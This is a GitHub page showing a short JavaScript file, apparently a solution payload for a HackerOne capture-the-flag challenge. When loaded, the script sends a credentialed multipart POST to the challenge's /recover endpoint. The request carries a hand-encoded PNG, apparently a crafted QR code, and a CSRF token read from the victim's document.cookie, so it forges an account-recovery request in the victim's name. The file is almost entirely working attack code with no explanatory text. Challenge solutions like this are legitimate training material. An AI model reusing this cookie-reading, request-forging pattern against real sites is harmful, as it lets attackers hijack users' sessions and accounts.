-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy patha3.js
29 lines (28 loc) · 7.93 KB
/
a3.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
function a()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/h1-415.h1ctf.com\/recover", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary9KGoAvuxr5owwqQi");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-GB,en-US;q=0.9,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundary9KGoAvuxr5owwqQi\r\n" +
"Content-Disposition: form-data; name=\"qrcode\"; filename=\"ms.png.png\"\r\n" +
"Content-Type: image/png\r\n" +
"\r\n" +
"\x89PNG\r\n" +
"\x1a\n" +
"\x00\x00\x00\rIHDR\x00\x00\x03\x02\x00\x00\x03\x02\x01\x00\x00\x00\x00\xf2\xc7L\x15\x00\x00\x08\xebIDATx\x9c\xed\x9d\xcd\x8d\xeb\xc6\x12\x85O\x9b\x02\xde\x92\xca`B\xa12pH\x83\x17\x923\xa0B\x99\x00\x0c\x90K\x01\x14\xca\x8b\xee\xaa:M\x19\xf0\xc2\xb8\xa4%\x1c.4\x92\xd8\xe4\x07\x11\xa8\xa9\xff\xeab\xf8\xb5\xc7\xfd\xb7_\x0c\x00D\x10A\x04\x11D\x10A\x04\x11D\x10A\x04\x11D\x10\xe1\x1cBi\xc7\x05\xed\xe3\xf5Y\xcam\xf5\xafo\xeb\x05\xb8_\xd1^\x80g\xfd\x1eX/~\xa3\xf5\x02_\x1c\x97\x1d\xfa\x1bD\x10A\x04\x00\x80\x99\x99a23\xb3e\xb0\x3c\xea\xe9\xc9\xccl\x06\x80i\x010\xd9\x06\x00\xben\x1e7\xd8\x0c\xc0\xe6\xd1\xac\xbe\xc4]\xda\xb5\x9f\xf0\x94D\x10\xe1}\x08.\xd3\x0b\x80i\x19,\xa5\xb6\xbd\x1b\xdbY3\xdb`\xf3\xb8\x01\x18sI\x13\xecz\x83*\xec\xcb`|\xf6\x13\x9e\x92\x08\"\xbc\x0f\xe1U\xa6\x97\xa1)\xe6\x3c\x0b\xb4\xb3\xac\x7f\x014\x05\xde\xe9\xf8z\x17\xc9\xb4\x08\"\xfcW\x08\xf7+P\xbe\x174;\xfb~E\x93\xda\xff\x7f=\x9a\x17}\xbf\x3eK\xf9^\x06+\xb7\xd1\x0c\xd5\xbd\xae\x1e\xf8e\x7f\xbb\x0f}J\"\x88\xf0\x9f%\xb8\x10\x8e\x06`\x050\xcd\x80a\x1d\xb6\x82\xf5\x8a\x02\\6\x00@\x99~.\xf5l\x99\xfe\xb8\xc0\xee_\x1b\x0c\xebe\xb3{\x19\x9a*\xbf_\x07\x18V\x80\x0bY\x3e\xe1)\x89 \xc2\xdb\x11\xee\xa5\x94R\xae@\r`\xdf\xea\xb7C3\xca[x{\xb0|W\xbe\x7f\xda\xba\xf2\xbd\x00\xe5\xb6^\xfc]F\xc5\x99\xf0\x0b\x0f\x11D\x10!\x8f\xaa\xa7\xbb\x02\xd1g1\xe0Q\xfc\xc4\xd6t\xf2\xfd+\xc2c\xe3\x06\xdc\xbf\x1e\x05\xed\xc4\xa3\x18\xd6g\xfd\xd8T\xfe\x91\xbfA\x04\x11D\xa0\x83bd\xc0\x10\xe9\xa9\xc1\x3c=\xb5U\x7f\xda\x97\x00\x1e\x06\xf7\xb3U\x81\xd7\xfc\xd6\x06\xb3\xb8\x95)F&\x82\x08\x87\x138?\x1d\xf2K\xd1\xeeP\xcc\x99\xc6jb?n/\x82=Q\xaa\x1bP\xdc[\x04\x11N \xb8\\\x02M\xff\xce\x00\xe9i4%\x8c\xa6\x7f[\xba\xab}\xb4\x19-\xfbE\xb5)\xed\x90\x9e\x16A\x84S\x08a{\xbb\xd9mK\x1a\xd6fUOGj\xda\xb53\x97\xa5pV\xda\x17\xe7\x9d%\xd3\"\x88p,\x81\xf4t\xab\x1b\xc9b2\xb7\xa9\xb964\xcaRjYY\x08v\xbd\x81\xa5Q\xbeI\xa6E\x10\xe1\x0c\x82W\x8a\xb9NvY\x85\x97{\x8ef\xbb\x90YS\xd9TV\x16\xday\xb4(.\x85\xfci\x11D8\x83\x00\x92K\x00-\xc6\xddD\xbcE\xbc\xd0\x94\xf5\x10\xeeu\x88xx\xdb3\xfd?h\x8b\xa5\xa7E\x10\xe1\x04B\xd7\x97U\x0f\xf6\x89sI\xb6_!c\xdc-\x0cnd\x8f\xb7\xb3\x8bdZ\x04\x11N!P\x3e\xaa\x9a\xd3\xd4e5\x86\xee\xce\xb0Wu\xb9A\x1d\x96\xe9O7\xe3}A\x97\xe9\xfa\x84\xa7$\x82\x08\xefC\xe0\xce\xabL\x3e\xb3\xee\xce\x88WoX/\xf0v\xea\xd0\xdd\xf1\xce\x83g\x92i\x11D8\x9a\x10\x11/D\xec\xba}\xf4\x90Yvb\xa2\tqU\xcc\xe1O\xa7\xd9\x9d\x167e\xc4\x3e\xe1)\x89 \xc2\xfb\x10\\\x88#\x0b5G\xf2\x8a\xc7!\xf81\x8f]\xa5X\xdc\xc0%\x3e3\xda\x92i\x11D8\x85\x10\xb6\xf7`\xac\x89\x17\xae\x0f\xab\x0b#?\x9d%d)\xcei\x8fg\x96[2-\x82\x08\'\x10\xb86\x14\x11\xc0\x9e\x01.(i\xc13V\xd6\x1e#sS\xbcY\xeb9\x05E\xfe\xb4\x08\"\x9cB\xe8jC\xd1\xd4,r\xf4PF\xb1C\xc4i\x3cY\x1a\xe0\xb3\x8f\"Ka\x97\x9e\x16A\x84\x13\x08\x9c\xcbb\xd1\x8d:\x94\x91cd\xa9\xac\xdb\xd5\xf4\xb1\xbbL\xf9i\x11D8\x89\x10\xb5\xa1!\xceK_\x03\xee\xb6w[\xbc\xf4K\xb2\xff\x12\xe8\x82li\x85\x7f\xc2S\x12A\x84\xf7!P\xbd\xb7Y\x16\x88./\xcdY\xeeLw}Y\xd9]\x1d\xc9+\xd5{\x8b \xc2\xa9\x84NV\x97\xccOg#%\xbfd\x18\x9c\xfc\xe9\xc9#h\xe0\x89\'\x11P\xfb\x84\xa7$\x82\x08\xefC u\xcc\xc3\x8a\xa2\xeb2\xd7\x91M\xbd\xa0\x0b\x94Y\xdf\xeb\xa1\xfc\xb4\x08\"\x9cH\xe0:\xb2\x1c8\x14\xdfQ\xd7t]\xbc\x00\xcdPO\xedLU\xde\xdd\t\xd9\xde\"\x88p\x3c\xa1\x9b]\x94\x86\xf5\xd25V\xef\x8a\xc9\xacKh\xd1\x3e\x1c\x91\xae\x86\xf6\xe1\x10A\x84\x93\x08\xbd?\x1d\xeep\x84\xb7\xf7U%q\x19\xf5Og\xeb\x87\xe7\xa7\xa1yd\"\x88p\x12\x81\x83\xd5\x93w^\xd1\x18\xef\x9cG\xd6\x8aAs4\xf0\xc0\xfd\xd3t\xf4\x9a]2-\x82\x08\x87\x12\xfa\xf9\xde\x00\xb8U\xb2\x9fp\xb0t\x97\xcd\x88tu4a\x9a\xbd\x14\xa3H\xa6E\x10\xe1\x1c\xc2\x18\xb1\xeb\xf0\x89\xdb\xf6w\x8f\x02\x8c\x8f\x92\xbb\xe1e\x8c\xbb\xdc\xc6GA\xf6\x7f\xd0\x92\x1f\xed)/\x82\x08\xa7\x10\xfaP\xd8@2\x9dY\xad\x8c\x82u\x83~\xb91\xb3KruIj\xe9i\x11D8\x94\xc0\xe9\xe5\xc9=k\x8f{sx,\xd3ST)\xd6\x0f\xf4\xf6\xff\x079\x9eL2-\x82\x08G\x13\xb8\x7f\xba\x1e\x91c\x8e$\x17e\xaa\xdb\xc1\x93A\xa9r\x94\xa2e\xea\xcb\x12A\x84s\x08\x94\xcb\xa2\x8e\xaa\xe8\xe6\xc8@\x997h \xd6\x01\xa9\x98y\xb2\xe0\x82X\'\x99\x16A\x84\xa3\t].k\xc9\xaf}\xa7\r\x1a]\xe2Am\xaf\x12\xddH\xc7\xb38\xef\x14\xfd\'\x3c%\x11Dx\x1f\xc2\xbe\xde\xdb3\xd5)\x97\xae\xa7kEJ:\xd5\x99\xc6\x1a\xf9#\x8f2\x92L\x8b \xc2\xe1\x04\x9e\x05\x1c\rV\x1e\xd4\x06@\xb3\x0e\"\x02\xde\xeb\xe4z\x97l\x9d\x0e[^2-\x82\x08\'\x10^\xe6\x9cX\xd4\x87E\x00,S[\xe9Os7Gf\xb5F\x8f\xaai\x1e\x99\x08\"\x9cD\xe8\xe7\x915\xeb\x9aF\x14\xc5\x9e\xd4\x88]\xb2\xf2\x1d\x0f@!k\xdd\x05[zZ\x04\x11\x8e\'\x80E7%\xd9r~\t\x8f\r\xacWd}\t\x95\x80f\x9988\xaa&\x99\x16A\x84c\t\xfb\x91\x06\x88\r\xa7\xbb.+\x00\xb1{\x0e\xcf\xf7^\x80T\xe5|+\x8f\xa5I\xa6E\x10\xe1X\x02\xc5\xc8\x3c\xc6\r\xd0F\xd21\x3c\xd4\xad\xeb~7\x9e.?\xedv\xfb&\x7fZ\x04\x11N#t9f\x80bd\xb9M|n\xad\xd1\xb9\xd79\x0c\x9c\xb3\xd2T\x82\"\xdb[\x04\x11\x8e\'\xec\rf\xdeM:}b\xf2\xac3\xb5\x85\x08\x88\xf3\xf6;\xdd\xae\x97\x92i\x11D8\x9a\xb0\xaf#\xe3\xa4T$\xb4\x9a\x10{\xbd(\x10sN\xc6\x0c\x8dG\rx\xaaw\xc9\xb4\x08\"\x1cN\xe8\xfdi\xf3\xa0\xd8\xd8\xed\x8b\x07DU\xc9\x98\x01\xf1\x17\x7f\x9as\xdb\x8b\xfci\x11D8\x85\xd0\xf7e\r!\x9c\xe8\xeaK\xec\xc5Y\xa6Mw\x80\xa8(\x1bw\x13\xc1%\xd3\"\x88p4\xa1\x9b\x89\xe01n?\x11:9%\x14\xe0\xbe\xac\x90x\xbe\"\xc3m\x92i\x11D8\x9c\xd0\xd5\x86R\xbfU\xcc9\xe9*\xbf}\xb1q\xff\xf4\xde\x9f\xceQ\n" +
"\x92i\x11D8\x9cpi\x7f\xd7\x0b0\xd9\xb3`\xfa\xf9\x9f\x95in\xa6x\xc1zE\x99\xaa\x1e~\x96\xbavZ\x802-\xd7b\xf7\xdf\xff\xbc\x00\xe3v\x01\xf0,\x86qA\x01\x06\xc3\xfd\xfa\'\xca4\x1f\xf3\x1bD\x10A\x04:\xc8\xf6\xe6\xefr\x9b\xda!,\xee\xd8\xff\xb2\xcby\x816\xc8\xa2\xc6.\xc5\xbdE\x10\xe1D\x82\xcdk)\xd9HYn\x00\xcc~.\xa8#C\xab$\xaf\x97jb\x97\x1b\x9e\x05X\x8b\x9f\x187\x94r}\x96R\xbe\x1e\xa5|\xff\x94:d\xb4\xdc\x0e\xfd\r\"\x88 \x02\x80\xae\x7f:*\xba\xdd\x1d\xde\xb8\xaf\x83\xfa\xb2\xc6\xfc\xb8\xd1]\xd8\x9f^\x14#\x13A\x84S\x08\xddL\x84\xb4\xae\xc1\xb9,\xde\x1bk7\xced\x8cHyX\xdc\xd1D\xad\xfc\xb4\x08\"\x9c@\xa0\xfe\xe9\xf6Eh\xe2\x3e[\x95J8\xfb\xac\xbd\xb6\xcc\x0bI\xa9rT\xfe\xb4\x08\"\x9cC\xa0\xeaO\x8a\x96\xb5I&\xd9k\x19\x93\xc9R\xd8i\x1e\x19\x8f\xfb\xa6i)\xd2\xd3\"\x88p\x3c\xe1\xb5\xde{\xec\xeaK\xc2\xa6\xde\xa9r\xd2\xd8S\x84\xbci\x17\xfaQ\xf9i\x11D8\x85\xd0\xef+\x9d\xd3\x11zg\x19\xdd\x3e\x1c\xd1\x7f\x99-\xd6\\/ji\xb7K\xa6E\x10\xe1h\xc2\x3e\xee\xdd\x8d\x12\x8cY%c\x14\x83f\x13uV\x9ee\xf9\x99\xbb\xd7\xea\xcb\x12A\x84\xb3\x08\x9d?M\xaa\xb7\xb7\xae\xfb\xc2\x13^\xe26z\xbf-\x07\x0f\x0e\xfe\x84\xa7$\x82\x08\xefC\xe0\xfd\xa7C\x10\xdbt\x04t\x1d\x96\xe9O\xb3\x88\xfbn\x3cQB\xd6n+\x7fZ\x04\x11\xce!\xfc\x8dLs\xe7\x06y\xdaY\x11\xda\xc6\x83\x0e]\xf5If\xbaF\xedk)\x82\x08\xe7\x11^d:O\xcc\xdeS\xcds\x7f3!\xdd5\\6;\x1b\x9e\xdf\xa2\x7f\x05\x9f\xf0\x94D\x10\xe1}\x08{\x7f\x9a\xc6\x11\xed\xf6\xba\xb4\x0cy[\xea\xe9\xb4\xccAn\xb8\xf4\xb4\x08\"\x9cEx\xa9\xf7\xa6\xd8W\xd4\x92\xe4\xde:\xbb\x1du\xda\xb51\x90\xd0\x15=g\xb9?\xe1)\x89 \xc2\xfb\x10\x8a\xfd\xf3\x9a\x7fu\xdc?\xe1)\x89 \x82\x08\"\x88 \x82\x08\"\x88 \x82\x08\"\x88 B\x7f\xfc\x05\xa2\xa6~O\xbd\xceZ\xf7\x00\x00\x00\x00IEND\xaeB`\x82\r\n" +
"------WebKitFormBoundary9KGoAvuxr5owwqQi\r\n" +
"Content-Disposition: form-data; name=\"_csrf_token\"\r\n" +
"\r\n" +
document.cookie.split("_csrf_token=")[1]+
"\r\n" +
"------WebKitFormBoundary9KGoAvuxr5owwqQi--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
a();